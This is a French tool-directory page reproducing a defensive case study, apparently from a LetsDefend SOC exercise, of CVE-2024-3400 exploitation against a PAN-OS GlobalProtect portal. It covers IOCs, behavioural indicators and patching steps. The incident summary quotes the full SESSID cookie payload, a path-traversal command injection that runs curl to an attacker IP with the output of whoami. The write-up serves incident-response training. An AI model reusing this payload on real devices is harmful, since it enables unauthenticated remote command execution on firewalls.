Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
letsdefend-cve2024-3400-case-study — Stratégies de détection, d'analyse et de réponse pour les tentatives d'exploitation de CVE-2024-3400 ciblant les portails GlobalProtect de Palo Alto PAN-OS. Comprend des IOCs, des modèles d'exploitation et des conseils d'atténuation. | Kitploit
Outils/GitHubGitHub/cyprianatsyor/letsdefend-cve2024-3400-case-study
Gestion des Indicateurs de Compromission (IOC)Analyse des VulnérabilitésExploitationExploitation d'Applications WebAnalyse ForensiqueCriminalistique NumériqueCommandement et ContrôleRenseignement sur les MenacesApprentissage et Éducation

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Réponse aux Incidents
Analyse de Journaux
GitHubcyprianatsyor/letsdefend-cve2024-3400-case-study

letsdefend-cve2024-3400-case-study

Stratégies de détection, d'analyse et de réponse pour les tentatives d'exploitation de CVE-2024-3400 ciblant les portails GlobalProtect de Palo Alto PAN-OS. Comprend des IOCs, des modèles d'exploitation et des conseils d'atténuation.

Voir le dépôt
il y a 1 anPas encore vérifié
Partager

letsdefend-cve2024-3400-case-study

Détection, analyse et stratégies de réponse pour les tentatives d'exploitation de CVE-2024-3400 ciblant les portails GlobalProtect de Palo Alto PAN-OS. Inclut les IOC, les schémas d'exploitation et les conseils d'atténuation.

Enquête sur l'incident CVE-2024-3400

🔍 Aperçu

Ce dépôt contient une enquête détaillée et une analyse des menaces liées à CVE-2024-3400, une vulnérabilité critique d'injection de commande sans authentification affectant le logiciel Palo Alto Networks PAN-OS, ciblant spécifiquement le portail GlobalProtect.

Le 18 avril 2024, une activité d'exploitation a été détectée contre un pare-feu PAN-OS interne utilisant le point de terminaison vulnérable /global-protect/login.esp. L'attaquant a utilisé un cookie SESSID malveillant contenant une commande curl exécutée par backtick pour atteindre un serveur C2 distant hébergé à 144.172.79.92 (Miami, Floride). La charge utile de l'exploit a utilisé ${IFS} pour contourner les filtres simples et a exploité le répertoire de télémétrie de PAN-OS pour préparer l'activité malveillante. Le pare-feu a répondu par un 200 OK, indiquant que la charge utile a probablement été exécutée avec succès.

Aperçu de l'incident

📄 Résumé de l'incident

  • ID de l'événement : 249

  • Règle de détection : SOC274 – Exploitation d'injection de commande PAN-OS

  • Heure de l'événement : 18 avril 2024, 03:09 UTC

  • Nom d'hôte : PA-Firewall-01

  • IP de destination : 172.16.17.139

  • IP source : 144.172.79.92

  • Méthode de requête : POST

  • Point de terminaison : /global-protect/login.esp

  • Charge utile du cookie : SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)

  • Hachages malveillants :

  • SHA256 : 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac

  • MD5 : 0c1554888ce9ed0da1583dbdf7b31651

🧠 Renseignement sur les menaces

Renseignement sur les menaces

Étape 1 : Détection initiale de l'exploit en recherchant sur Malpedia

Étape 1 de l'investigation

Étape 2 : Analyse et investigation du hachage

Étape 2 de l'investigation

Étape 3 : Autre investigation

Étape 3 de l'investigation

Étape 4 : Investigation de l'adresse IP

Étape 4 de l'investigation

🧠 Indicateurs comportementaux

  • Abus de SESSID pour l'injection de commande
  • Utilisation de ${IFS} pour l'évasion
  • Préparation de la charge utile dans /opt/panlogs/tmp/device_telemetry
  • Implication du processus dt_send après l'exploitation
  • Rappel réseau vers l'IP de l'attaquant sur le port 4444

📄 Preuve de journal

Exemple de journal


🧩 Corrélation de hachages

Correspondance de hachage


✅ Points gagnés sur LetsDefend

Points clés

🚨 Impact

  • Exécution de commande à distance sans authentification sur un équipement de sécurité central
  • Téléchargement et exécution possible d'une charge utile Python contrôlée par l'attaquant
  • Abus des mécanismes de télémétrie internes de PAN-OS pour la préparation ou l'exfiltration
  • Trafic autorisé depuis une IP malveillante connue

✅ Actions de réponse recommandées

  1. Mettez à jour PAN-OS vers les versions : 10.2.9-h1, 11.0.4-h1, ou 11.1.2-h3
  2. Bloquez l'IP malveillante : 144.172.79.92
  3. Recherchez des indicateurs de compromission (IOC) dans les journaux et les systèmes de fichiers
  4. Inspectez les répertoires de télémétrie pour des fichiers suspects ou un comportement d'exécution
  5. Isolez les systèmes affectés et effectuez une analyse médico-légale complète

📁 Contenu

  • logs/ : Journaux de détection analysés et bruts
  • ioc/ : Hachages de fichiers et IP associés à l'attaque
  • analysis/ : Analyse approfondie du comportement de l'exploit et traçage des processus
  • report/ : Résumé et images des journaux et codes de mes investigations

Qu'est-ce que CVE-2024-3400

CVE-2024-3400 fait référence à une vulnérabilité critique dans Palo Alto Networks PAN-OS, affectant spécifiquement les passerelles GlobalProtect. Voici un résumé de ce qui est publiquement connu à ce sujet :

🔥 CVE-2024-3400 – Vulnérabilité d'injection de commande Palo Alto PAN-OS

Score CVSS : 10.0 (Critique)

Publié : avril 2024

Produits concernés : PAN-OS 10.2, 11.0 et 11.1 lorsque GlobalProtect est activé.

Exploitation : confirmée dans la nature (zero-day)

Type de vulnérabilité : injection de commande sans authentification

🧠 Quel est le risque ?

CVE-2024-3400 permet à des attaquants non authentifiés d'exécuter des commandes arbitraires sur le système d'exploitation du pare-feu. Cela donne essentiellement un contrôle total sur les appareils affectés sans avoir besoin d'identifiants — un point de compromission sérieux pour toute entreprise utilisant des pare-feu Palo Alto.

⚠️ Conditions requises pour l'exploitation :

  • La passerelle GlobalProtect doit être activée.
  • Versions spécifiques de PAN-OS (10.2.x, 11.0.x, 11.1.x).
  • Exploitable via Internet si aucune couche de sécurité supplémentaire n'est présente.

🔎 Ce que font les attaquants :

  • Envoi de requêtes conçues pour exploiter la faille d'injection.
  • Déploiement de shells distants ou téléchargement de charges utiles de second stade.
  • Les comportements observés incluent :
    • Exécution de commandes via des URL conçues
    • Mécanismes de persistance
    • Mouvement latéral au sein des réseaux

🛡️ Atténuation et recommandations :

  • Correction immédiate : Palo Alto a publié des correctifs ; mettez à jour vers des versions non vulnérables (par exemple, 10.2.9-h1, 11.0.4-h1, 11.1.2-h3 ou ultérieures).
  • Recherchez des indicateurs de compromission (IOC) tels que des processus suspects, des connexions sortantes ou un historique CLI inhabituel.
  • Utilisez des outils comme Shodan ou des inventaires d'actifs pour trouver des équipements vulnérables.

🛠️ Comment enquêter (par exemple, via LetsDefend ou un SIEM) :

  • Recherchez des IP externes accédant à GlobalProtect sans authentification valide.
  • Vérifiez l'exécution de commandes suspectes dans les journaux (show system processes, cat /etc/passwd, etc.).
  • Surveillez le comportement du pare-feu et alertez sur les connexions sortantes anormales.

Ce dépôt sert à la fois de rapport d'investigation interne et de ressource pédagogique pour les défenseurs cherchant à comprendre l'exploitation réelle des vulnérabilités PAN-OS. Les contributions et observations supplémentaires sont les bienvenues.

Télécharger l’outil

Script malveillant : update.py (exécuté avec /usr/bin/python3)